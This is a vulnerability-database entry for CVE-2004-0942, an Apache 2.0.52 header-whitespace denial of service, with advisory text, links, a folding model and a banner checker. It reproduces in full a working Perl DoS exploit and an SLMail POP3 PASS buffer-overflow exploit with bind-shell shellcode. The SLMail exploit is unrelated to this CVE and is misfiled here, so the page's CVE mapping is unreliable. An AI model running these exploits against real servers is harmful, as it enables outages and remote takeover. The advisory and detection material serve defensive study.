CVE-2004-0942
CVSS 5.0
Published: 2005-02-09 00:00:00
Revised: 2016-10-17 22:50:03

[Original] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.


[CNNVD] Apache Web Server Whitespace Handling Remote Denial of Service Vulnerability (CNNVD-200502-041)

        Apache Web Server is an HTTP server.
        Apache Web Server does not correctly handle requests whose header block contains many space characters; a remote attacker can use this to mount a denial-of-service attack against the server.
        Chintan Trivedi reported that a remote attacker can send specially crafted HTTP GET requests whose header block is made up of many lines consisting only of space characters. A line that begins with whitespace is parsed as a continuation (folding) of the preceding header, and the work the server does to fold thousands of such lines consumes enough CPU and memory to deny service.
        The vendor later noted that the request-field length limit does not adequately prevent this request shape: the public PoC keeps every line at 8000 bytes, below the default LimitRequestFieldSize of 8190, so no single line trips the limit.
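The request shape described above, and why a per-field length limit does not stop it, as an added illustration (a toy model written for this entry, not Apache httpd source): a header reader that folds continuation lines the expensive way, keeping every line buffer and checking the limits only on the collapsed field and the field count, next to a reader that charges every byte it reads against the field limit. The limit values are the httpd defaults for LimitRequestFieldSize and LimitRequestFields; the Host header and the request builder are constructed input; the bounded reader is one way to cap the cost, not a transcription of the upstream fix.

```python
"""Toy model of header folding for CVE-2004-0942 (illustration, not httpd code)."""
from typing import Callable, Dict, List

LIMIT_REQUEST_FIELD_SIZE = 8190   # httpd default: max bytes in one header field
LIMIT_REQUEST_FIELDS = 100        # httpd default: max number of header fields
LWS = b" \t"                      # linear white space (RFC 2616)


class HeaderLimitExceeded(Exception):
    """Toy equivalent of httpd answering 400 Bad Request."""


def build_dos_request(lines: int, width: int = 8000) -> bytes:
    """Constructed input in the shape the PoC sends: request line, one real
    header, then `lines` lines holding nothing but `width` spaces. A line that
    begins with SP/HTAB continues the preceding field, so all of them fold
    into the Host header."""
    cont = b" " * width + b"\r\n"
    return b"GET / HTTP/1.0\r\nHost: example.test\r\n" + cont * lines + b"\r\n"


def header_lines(raw: bytes) -> List[bytes]:
    """The header block: drop the request line, stop at the empty line."""
    lines = raw.split(b"\r\n")[1:]
    return lines[:lines.index(b"")] if b"" in lines else lines


def read_headers_naive(raw: bytes) -> Dict[str, object]:
    """Fold the costly way: keep every line buffer for the life of the
    request (pool-style allocation), scan the leading LWS, rebuild the field
    by concatenation. Both limits are checked on the collapsed field and on
    the field count, so N whitespace-only lines cost N * width bytes of
    memory and scanning while the checks only ever see one short field."""
    fields: List[bytes] = []
    retained = scanned = 0
    for line in header_lines(raw):
        buf = bytes(line)                 # fresh buffer, never released early
        retained += len(buf)
        if buf[:1] in (b" ", b"\t") and fields:
            scanned += len(buf)
            # folding LWS collapses to one SP; the whole field is re-copied
            fields[-1] = fields[-1].rstrip(LWS) + b" " + buf.lstrip(LWS)
        else:
            fields.append(buf)
        if len(fields[-1]) > LIMIT_REQUEST_FIELD_SIZE:
            raise HeaderLimitExceeded("field too long")
        if len(fields) > LIMIT_REQUEST_FIELDS:
            raise HeaderLimitExceeded("too many fields")
    return {"fields": [f.rstrip(LWS) for f in fields],
            "retained": retained, "scanned": scanned}


def read_headers_bounded(raw: bytes) -> List[bytes]:
    """Same folding, but every byte read for a field, continuation lines
    included, counts against LimitRequestFieldSize, so one field can never
    cost more than the limit (one way to bound it; not the upstream patch)."""
    fields: List[bytes] = []
    raw_len = 0
    for line in header_lines(raw):
        if line[:1] in (b" ", b"\t") and fields:
            raw_len += len(line) + 1      # +1 for the folded SP
            if raw_len > LIMIT_REQUEST_FIELD_SIZE:
                raise HeaderLimitExceeded("folded field too long")
            fields[-1] = fields[-1].rstrip(LWS) + b" " + line.lstrip(LWS)
        else:
            raw_len = len(line)
            if raw_len > LIMIT_REQUEST_FIELD_SIZE:
                raise HeaderLimitExceeded("field too long")
            fields.append(line)
            if len(fields) > LIMIT_REQUEST_FIELDS:
                raise HeaderLimitExceeded("too many fields")
    return [f.rstrip(LWS) for f in fields]


def rejects(reader: Callable[[bytes], object], raw: bytes) -> bool:
    """True when the reader refuses the request with a 400-style error."""
    try:
        reader(raw)
    except HeaderLimitExceeded:
        return True
    return False


if __name__ == "__main__":
    req = build_dos_request(lines=2000)   # 16 MB of spaces folding into one field
    st = read_headers_naive(req)
    print("naive: %d field(s), %d bytes retained, %d bytes scanned"
          % (len(st["fields"]), st["retained"], st["scanned"]))
    print("bounded rejects it:", rejects(read_headers_bounded, req))
```

Running it shows the asymmetry the advisory describes: the naive reader accepts a 16 MB header block as a single 18-byte Host field, having retained and scanned all 16 MB, while the bounded reader rejects the request on the second continuation line. Legitimate folded headers (a value continued on an indented line) produce the same result in both readers.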

- CVSS (base score)

CVSS score: 5.0 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:10962 Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MI...
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definition for more technical details on detection.
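A banner-based check in the spirit of the OVAL definition, added for this entry (my own code, not the OVAL content): it pulls the Server: value out of a response and classifies it against the range this page gives, 2.0.x up to and including 2.0.52 affected and 2.0.53 fixed. Other branches are reported as out of scope rather than safe, and a banner that hides the version (ServerTokens Prod) as unknown. The sample response is constructed, not captured from a real host.

```python
"""Apache Server: banner check for CVE-2004-0942 (added example)."""
import re
from typing import Optional, Tuple

FIXED_IN = (2, 0, 53)                                  # from this page's solution text
_BANNER = re.compile(r"\bApache/(\d+)\.(\d+)\.(\d+)")


def parse_apache_version(server_value: str) -> Optional[Tuple[int, int, int]]:
    """Version triple from a Server: value such as
    'Apache/2.0.52 (Unix) mod_ssl/2.0.52', or None when the banner hides it
    (ServerTokens Prod yields just 'Apache')."""
    m = _BANNER.search(server_value)
    if not m:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def assess(server_value: str) -> str:
    """'vulnerable', 'fixed', 'out-of-scope' or 'unknown' for one banner."""
    v = parse_apache_version(server_value)
    if v is None:
        return "unknown"
    if v[:2] != (2, 0):
        return "out-of-scope"            # this entry only covers the 2.0 branch
    return "vulnerable" if v < FIXED_IN else "fixed"


def server_value_from_response(raw: bytes) -> str:
    """Pull the Server: header out of a raw HTTP response (for instance the
    reply to HEAD /); empty string if the header is absent."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            return value.strip()
    return ""


if __name__ == "__main__":
    # Constructed sample response, not captured from a real host
    sample = (b"HTTP/1.1 200 OK\r\nDate: Mon, 01 Nov 2004 00:00:00 GMT\r\n"
              b"Server: Apache/2.0.52 (Unix)\r\nContent-Length: 0\r\n\r\n")
    banner = server_value_from_response(sample)
    print(banner, "->", assess(banner))
```

Treat "vulnerable" as "check the package", not as proof: the distribution advisories listed below (Red Hat, Mandrake and others) ship the fix as a patched package that keeps the old version string, so only the package changelog or the vendor's own check tells you whether a banner like Apache/2.0.46 has the fix backported.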

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0942
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0942
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-041
(official data source) CNNVD

- Other links and resources

http://lists.apple.com/archives/security-announce/2005//Aug/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2005-08-17
http://lists.apple.com/archives/security-announce/2005/Aug/msg00000.html
(UNKNOWN)  APPLE  APPLE-SA-2005-08-15
http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/028248.html
(UNKNOWN)  FULLDISC  20041101 DoS in Apache 2.0.52 ?
http://marc.info/?l=bugtraq&m=110384374213596&w=2
(UNKNOWN)  HP  SSRT4876
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102198-1
(UNKNOWN)  SUNALERT  102198
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://www.mandriva.com/security/advisories?name=MDKSA-2004:135
(UNKNOWN)  MANDRAKE  MDKSA-2004:135
http://www.redhat.com/support/errata/RHSA-2004-562.html
(UNKNOWN)  REDHAT  RHSA-2004:562
http://www.trustix.org/errata/2004/0061/
(UNKNOWN)  TRUSTIX  2004-0061
http://www.vupen.com/english/advisories/2006/0789
(UNKNOWN)  VUPEN  ADV-2006-0789
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01123
(UNKNOWN)  HP  HPSBUX01123
http://xforce.iss.net/xforce/xfdb/17930
(VENDOR_ADVISORY)  XF  apache-http-get-dos(17930)

- Vulnerability information

Apache Web Server Whitespace Handling Remote Denial of Service Vulnerability
Medium severity   Insufficient information
Published 2005-02-09 00:00:00   Updated 2005-10-20 00:00:00
Remote / Local

- Advisories and patches

        The vendor has released an update (Apache httpd 2.0.53) that fixes this issue. Download link:
        http://httpd.apache.org/

- Vulnerability information (855)

Apache <= 2.0.52 HTTP GET request Denial of Service Exploit (EDBID:855)
Platform: multiple   Type: dos
2005-03-04   Verified
Author: GreenwooD
#!/usr/bin/perl
#
# Based on ->
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
#
# Added ->
#             Added a feature with which we can exploit Apache web servers on Windows systems. For it you should experiment
#             with the [trys] parameter of this code.
#
#             By default the parameter trys = 8000; to DoS Apache web servers on Windows systems try to
#             increase this parameter.
#
#             For example, on my system I have 256MB of RAM. To DoS Apache web servers I run this exploit like this:
#
#             C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
# Note ->
#             If the progress bar does not respond, the server may already be DoSed. Try to open a web page hosted on this web server.
#             If you see "Error 500" you are a lucky man :)
#
# Warnings ->
#             This is PoC code; you may use it only on your own servers. The writer is not responsible if you damage your servers or
#             use it for attacks, or other things.
#
# Shit ->
#             My English now is bullshit :( I am trying to study it :)
#
# Tested under Windows 2000 SP4 with Apache 2.0.49 (Win)
#
# Greets fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.
#
# Contact me at greenwood3[AT]yandex[dot]ru

use strict;
use warnings;
use IO::Socket;

if (@ARGV < 1) {
    print "\n ::: ---------------------------------------------- :::\n";
    print " ::: Another yet DoS exploit for Apache <= 2.0.52   :::\n";
    print " ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::\n";
    print " ::: Coded by GreenwooD from Network Security Team  :::\n";
    print " ::: ---------------------------------------------- :::\n";
    exit();
}

$| = 1;    # unbuffered STDOUT so the progress bar shows while sending

print "\n <+> Prepare to start connect.\n";

my $s = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $ARGV[0],
    PeerPort => 80,
    Timeout  => 6,
) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
$s->autoflush();

print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";

# Request line only; the header block that follows is what does the damage
print $s "GET / HTTP/1.0\n";

my $trys = 8000;    # Default
$trys = $ARGV[1] if $ARGV[1];

print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS: send second part of devil header.\n";
print " <SOD> |";

# Each line is 8000 spaces and a newline. A line starting with whitespace
# is a header continuation line, so the server folds every one of them
# into the preceding header instead of rejecting the request.
my $i = 0;
do {
    print $s (" " x 8000 . "\n");
    print "=" if ($i % 500 == 0);
    ++$i;
} until ($i == $trys);

print "> <EOD>\n";

close($s);

print " <+> Ok now target web server maybe DoSeD.\n";

# milw0rm.com [2005-03-04]

- Vulnerability information (F35097)

slmail5x.txt (PacketStormID:F35097)
2004-11-20 00:00:00
Author: muts (whitehat.co.il)
Tags: exploit, remote, overflow, shell
Platform: windows, 2k
CVE-2004-0942

SLMail 5.x POP3 remote PASS buffer overflow exploit that binds a shell to port 4444. Tested on Windows 2000 SP4.

SLMail 5.x POP3 Remote Pass Buffer Overflow Exploit

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942

INTRO:

SLMail Pro is web-based POP3 and SMTP email server software for Microsoft
Windows 2000 that includes advanced features usually found in
enterprise-level systems.
Seattlelab has been providing businesses with an alternative to expensive 
email server software for 10 years. Because of its stability, features, and 
price, SLMail Pro has created a niche in a competitive market, proving there 
is no need to spend a small fortune to implement a secure, full-featured 
email server solution.



PoC:

####################################################
#                                                  #
# SLmail 5.5 POP3 PASS Buffer Overflow             #
# Discovered by : Muts                             #
# Coded by : Muts                                  #
# WWW.WHITEHAT.CO.IL                               #
# Plain vanilla stack overflow in the PASS command #
#                                                  #
####################################################
# D:\Projects\BO>SLmail-5.5-POP3-PASS.py           #
####################################################
# D:\Projects\BO>nc -v 192.168.1.167 4444          #
# localhost.lan [192.168.1.167] 4444 (?) open      #
# Microsoft Windows 2000 [Version 5.00.2195]       #
# (C) Copyright 1985-2000 Microsoft Corp.          #
# C:\Program Files\SLmail\System>                  #
####################################################

# Python 3 port of the original Python 2 PoC (byte strings, print function);
# the payload, offset and return address are unchanged.
import socket
import struct

print("\n\n############################")
print("\nSLmail 5.5 POP3 PASS Buffer Overflow")
print("\nFound & coded by muts [at] whitehat.co.il")
print("\nFor Educational Purposes Only!")
print("\n\n############################")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Payload: bind shell on TCP 4444, as shipped with the original PoC
sc = b"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
sc += b"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
sc += b"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
sc += b"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
sc += b"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
sc += b"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
sc += b"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
sc += b"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
sc += b"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
sc += b"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
sc += b"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
sc += b"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
sc += b"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
sc += b"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
sc += b"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
sc += b"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
sc += b"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
sc += b"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
sc += b"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
sc += b"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
sc += b"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
sc += b"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
sc += b"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
sc += b"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
sc += b"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

# Tested on Win2k SP4 unpatched
# Change the return address if needed
# Layout: 4654 bytes of filler up to the saved return address, the
# overwritten return address (little-endian), a 32-byte NOP sled, then the shellcode.
buffer = b"\x41" * 4654 + struct.pack("<L", 0x783d6ddf) + b"\x90" * 32 + sc
try:
    print("\nSending evil buffer...")
    s.connect(("192.168.1.167", 110))
    data = s.recv(1024)                  # POP3 greeting
    s.send(b"USER username\r\n")
    data = s.recv(1024)
    s.send(b"PASS " + buffer + b"\r\n")  # overflow happens while handling PASS
    data = s.recv(1024)
    s.close()
    print("\nDone! Try connecting to port 4444 on victim machine.")
except socket.error:
    print("Could not connect to POP3!")

Regards to muts and WH. Support the Whoppix project: http://whoppix.net/

- Vulnerability information (F35049)

apache-squ1rt.c (PacketStormID:F35049)
2004-11-18 00:00:00
Author: Daniel Guido
Tags: exploit, remote, denial of service
CVE-2004-0942

Apache v2.0.52 remote denial of service exploit (version two) which sends a lot of spaces, consuming CPU and RAM. Versions between 2.0.35 and 2.0.52 may be vulnerable, but only v2.0.50 through 2.0.52 were tested.

- Vulnerability information

11391
Apache HTTP Server Header Parsing Space Saturation DoS
Remote / Network Access   Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Apache contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker sends specially crafted requests with a large number of overly long headers comprised only of spaces, and will result in loss of availability for the server.

- Timeline

2004-11-01 Unknown
2004-11-01 Unknown

- Solution

Upgrade to version 2.0.53-dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of The MITRE Corporation; their official data sources are kept on MITRE's websites.